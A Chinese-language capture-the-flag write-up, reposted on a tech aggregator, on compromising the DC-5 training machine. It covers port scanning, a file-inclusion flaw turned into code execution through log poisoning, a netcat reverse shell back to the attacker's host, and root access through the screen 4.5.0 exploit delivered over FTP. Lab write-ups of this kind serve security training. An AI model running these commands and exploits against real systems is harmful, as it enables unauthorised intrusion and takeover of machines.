IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> DC5靶机训练 -> 正文阅读

[PHP知识库]DC5靶机训练

kali🐓:192.168.78.131
DC-5:

老样子,查看IP段,扫描存活主机及开放端口

ifconfig
nmap -sP 192.168.78.0/24 
nmap -p 1-65535 -A -sV 192.168.78.133

在这里插入图片描述
发现靶机:192.168.78.138
开放端口:80 、111

访问80端口
在这里插入图片描述
什么也没有发现,试着扫一下目录
在这里插入图片描述
都没又什么用,去MSF查询一个Nginx1.6有无漏洞
在这里插入图片描述没有可以利用的地方,暂时从80端口没有思绪

Emmm后面发现有个留言板,之前没看到

在这里插入图片描述留言看看

在这里插入图片描述发现url可疑,其次之前扫到的footer.php也可以,footer PHP导致 foot可以发生改变
因此可以推断:thankyou.php?firstnam…=6这个页面包含了footer.php的内容,至于包含参数,目测是file,先进行测试一下

在这里插入图片描述
再次刷新
在这里插入图片描述

确认了存在任意文件包含漏洞

在这里插入图片描述
可以查都到一些信息,但是如果我们要连上shell的话,当然需要命令执行反弹shell
这里的思路就是在日志文件中反弹shell
先来测试一下日志文件是否存在

先写入反弹shell到日志文件
在这里插入图片描述
写入UA头中包含失败,再进行包含,不知道为啥
只有换个写法,这地方写入的时候有点小坑

在这里插入图片描述
写入后进行测试:

在这里插入图片描述
反弹shell看看:

nc 192.168.78.131 2333 -c /bin/bash

在这里插入图片描述
切换到交互式终端:

python -c "import pty;pty.spawn('/bin/bash')"

查看一下root执行的命令有哪些:

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述

发现一个可疑的screen-4.5.0百度一番无果

直接去MSF中查询

searchsploit screen 4.5.0

在这里插入图片描述复制粘贴出来,方便我们上传到DC机器

在这里插入图片描述

将41154.sh中的C语言代码复制出来,命名为 libhax.c

在这里插入图片描述

按照要求进行编译:

在这里插入图片描述
将41154.sh中下面一部分c语言代码另存为rootshell.c,然后编译

在这里插入图片描述将剩余部分代码保存为dc5.sh 并手动加入:

set ff =unix

在这里插入图片描述

在kali攻击机上安装并启动服务端vsftpd服务;

apt-get install vsftpd

直接登录我自己的e1even用户目录

在这里插入图片描述

先查看进程的服务 启动关闭FTP

ps -e | grep ftp
service vsftpd stop
ps -e | grep ftp
service vsftpd start

在这里插入图片描述
FTP远程连接:

在这里插入图片描述
注意,这里一定要先进入到dc5靶机的tmp目录下

lcd /tmp

防止出错给要下载的文件赋予777权限

chmod 777 xxx

使用get命令进行下载

get dc5.sh
get xxx

在这里插入图片描述

退出FTP,再受害机执行脚本

chmod 777 dc5.sh
chmod 777 rootshell
chmod 777 xxx
sh dc5.sh

在这里插入图片描述

提权成功
全局搜索,找到flag存放位置:

 find / -name "*flag*" 2> /dev/null

在这里插入图片描述
拿到FLAG:
在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-09-05 10:35:27  更:2021-09-05 10:35:31 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 10:26:32-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码